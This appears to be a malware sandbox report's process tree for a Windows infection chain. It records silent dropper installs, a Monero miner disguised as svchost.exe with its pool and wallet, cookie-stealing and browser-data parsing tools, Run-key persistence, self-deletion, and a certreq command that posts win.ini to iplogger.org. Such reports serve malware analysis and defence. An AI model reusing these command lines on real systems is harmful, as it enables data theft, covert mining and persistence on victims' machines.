        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5148 /prefetch:8
        20⤵
        
        PID:7120
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:8
        20⤵
        
        PID:1900
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:8
        20⤵
        
        PID:6428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 /prefetch:8
        20⤵
        
        PID:6152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5036 /prefetch:8
        20⤵
        
        PID:3900
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:8
        20⤵
        
        PID:6312
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3384 /prefetch:8
        20⤵
        
        PID:6184
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2192 /prefetch:8
        20⤵
        
        PID:7148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:8
        20⤵
        
        PID:6172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1776 /prefetch:8
        20⤵
        
        PID:6832
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3336 /prefetch:8
        20⤵
        
        PID:4940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3304 /prefetch:8
        20⤵
        
        PID:5260
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:8
        20⤵
        
        PID:6948
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3292 /prefetch:8
        20⤵
        
        PID:5072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4912 /prefetch:8
        20⤵
        
        PID:6532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4044 /prefetch:8
        20⤵
        
        PID:3548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3660 /prefetch:8
        20⤵
        
        PID:6924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5116 /prefetch:8
        20⤵
        
        PID:6228
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4772 /prefetch:8
        20⤵
        
        PID:6672
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3544 /prefetch:8
        20⤵
        
        PID:6068
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5544 /prefetch:8
        20⤵
        
        PID:2004
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:8
        20⤵
        
        PID:6784
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
        20⤵
        
        PID:6652
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5684 /prefetch:8
        20⤵
        
        PID:6704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5824 /prefetch:8
        20⤵
        
        PID:4892
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3484 /prefetch:8
        20⤵
        
        PID:6272
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4968 /prefetch:8
        20⤵
        
        PID:4680
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:8
        20⤵
        
        PID:5984
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2308 /prefetch:8
        20⤵
        
        PID:6584
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4696 /prefetch:8
        20⤵
        
        PID:6188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
        20⤵
        
        PID:4676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4632 /prefetch:8
        20⤵
        
        PID:7032
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5752 /prefetch:8
        20⤵
        
        PID:4052
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5788 /prefetch:8
        20⤵
        
        PID:6708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4300 /prefetch:8
        20⤵
        
        PID:6232
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2644 /prefetch:1
        20⤵
        
        PID:5728
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3380 /prefetch:8
        20⤵
        
        PID:1104
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5448 /prefetch:8
        20⤵
        
        PID:2876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:8
        20⤵
        
        PID:5564
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4204 /prefetch:8
        20⤵
        
        PID:1604
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1660,6865956881238960791,18085014316047281387,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5080 /prefetch:2
        20⤵
        
        PID:6684
        
        C:\Windows\regedit.exe
        
        regedit /s chrome-set.reg
        16⤵
        Runs .reg file with regedit
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b firefox
        16⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b chrome
        16⤵
        
        PID:6404
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
        
        parse.exe -f json -b edge
        16⤵
        
        PID:6456
        
        C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\DataFinder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\DataFinder.exe" /Verysilent
        12⤵
        
        PID:4392
        
        C:\Users\Admin\Services.exe
        
        "C:\Users\Admin\Services.exe"
        13⤵
        
        PID:648
        
        C:\Windows\System32\svchost.exe
        
        C:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth
        14⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\Delta.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\Delta.exe" /Verysilent
        12⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\is-UFADA.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UFADA.tmp\Delta.tmp" /SL5="$503D6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\Delta.exe" /Verysilent
        13⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\is-1S369.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1S369.tmp\Setup.exe" /VERYSILENT
        14⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 956
        15⤵
        Program crash
        
        PID:3220
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1012
        15⤵
        Program crash
        
        PID:4652
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1032
        15⤵
        Program crash
        
        PID:4436
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1204
        15⤵
        Program crash
        
        PID:3168
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1268
        15⤵
        Program crash
        
        PID:5724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1304
        15⤵
        Program crash
        
        PID:4224
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1352
        15⤵
        Program crash
        
        PID:6480
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1552
        15⤵
        Program crash
        
        PID:4532
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1456
        15⤵
        Program crash
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\zznote.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\zznote.exe" /Verysilent
        12⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\is-J6O3J.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-J6O3J.tmp\zznote.tmp" /SL5="$703D6,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\zznote.exe" /Verysilent
        13⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\is-PHJ5A.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-PHJ5A.tmp\jg4_4jaa.exe" /silent
        14⤵
        
        PID:6552
        
        C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-SIGE4.tmp\hjjgaa.exe" /Verysilent
        12⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:6324
        
        C:\Users\Admin\AppData\Local\Temp\yyxubot0p3b\30hvbmszgfk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yyxubot0p3b\30hvbmszgfk.exe" 57a764d042bf8
        8⤵
        
        PID:5064
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\X55F7QRX4U\X55F7QRX4.exe" 57a764d042bf8 & exit
        9⤵
        
        PID:5924
        
        C:\Program Files\X55F7QRX4U\X55F7QRX4.exe
        
        "C:\Program Files\X55F7QRX4U\X55F7QRX4.exe" 57a764d042bf8
        10⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Local\Temp\qgrfgz0pxnb\b4jpm3xrrv3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qgrfgz0pxnb\b4jpm3xrrv3.exe" testparams
        8⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Roaming\3t3iroapzar\iunhmwl5zow.exe
        
        "C:\Users\Admin\AppData\Roaming\3t3iroapzar\iunhmwl5zow.exe" /VERYSILENT /p=testparams
        9⤵
        
        PID:5940
        
        C:\Users\Admin\AppData\Local\Temp\cxmkh0nd045\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cxmkh0nd045\chashepro3.exe" /VERYSILENT
        8⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\2yxz1dwbbru\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2yxz1dwbbru\vpn.exe" /silent /subid=482
        8⤵
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\is-OA4HN.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OA4HN.tmp\vpn.tmp" /SL5="$1039E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\2yxz1dwbbru\vpn.exe" /silent /subid=482
        9⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5324
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:4300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:4840
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:5128
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:1436
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:7104
        
        C:\Users\Admin\AppData\Local\Temp\523ts3kucij\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\523ts3kucij\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:4920
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      PID:2828
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:4060
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:4132
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      PID:4264
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      Executes dropped EXE
      PID:4616
    - - C:\ProgramData\8708942.95
        
        "C:\ProgramData\8708942.95"
        5⤵
        Executes dropped EXE
        
        PID:4768
    - - C:\ProgramData\685218.7
        
        "C:\ProgramData\685218.7"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4788
      - C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        6⤵
        Executes dropped EXE
        
        PID:5060
    - - C:\ProgramData\3882968.42
        
        "C:\ProgramData\3882968.42"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4848
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:4180
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2640
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:4868

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2364
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 1B6CF20B4B403AD8633105B1D7378960 C
  2⤵
  - Loads dropped DLL
  PID:184

C:\Users\Admin\AppData\Local\Temp\is-Q05PG.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q05PG.tmp\chashepro3.tmp" /SL5="$20360,1446038,58368,C:\Users\Admin\AppData\Local\Temp\cxmkh0nd045\chashepro3.exe" /VERYSILENT
1⤵
PID:4780
- C:\Program Files (x86)\JCleaner\5.exe
  "C:\Program Files (x86)\JCleaner\5.exe"
  2⤵
  PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"
    3⤵
    PID:5840
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:5936
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c "start https://iplogger.org/1aSny7"
  2⤵
  PID:4980
- C:\Program Files (x86)\JCleaner\whiterauf.exe
  "C:\Program Files (x86)\JCleaner\whiterauf.exe"
  2⤵
  PID:4888
- - C:\Program Files (x86)\JCleaner\whiterauf.exe
    "{path}"
    3⤵
    PID:4932
- C:\Program Files (x86)\JCleaner\Venita.exe
  "C:\Program Files (x86)\JCleaner\Venita.exe"
  2⤵
  PID:2060
- - C:\Program Files (x86)\JCleaner\Venita.exe
    "{path}"
    3⤵
    PID:6136
- C:\Program Files (x86)\JCleaner\Abbas.exe
  "C:\Program Files (x86)\JCleaner\Abbas.exe"
  2⤵
  PID:1372
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
  2⤵
  PID:5040
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
  2⤵
  PID:4996
- - C:\Windows\SysWOW64\certreq.exe
    certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
    3⤵
    PID:4860

C:\Users\Admin\AppData\Local\Temp\is-BKDSJ.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BKDSJ.tmp\IBInstaller_97039.tmp" /SL5="$20364,14437942,721408,C:\Users\Admin\AppData\Local\Temp\523ts3kucij\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
1⤵
PID:4328
- C:\Users\Admin\AppData\Local\Temp\is-A7LKC.tmp\{app}\chrome_proxy.exe
  "C:\Users\Admin\AppData\Local\Temp\is-A7LKC.tmp\{app}\chrome_proxy.exe"
  2⤵
  PID:4760
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
  2⤵
  PID:4808

C:\Users\Admin\AppData\Local\Temp\is-S806F.tmp\iunhmwl5zow.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S806F.tmp\iunhmwl5zow.tmp" /SL5="$30362,329392,58368,C:\Users\Admin\AppData\Roaming\3t3iroapzar\iunhmwl5zow.exe" /VERYSILENT /p=testparams
1⤵
PID:6032

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
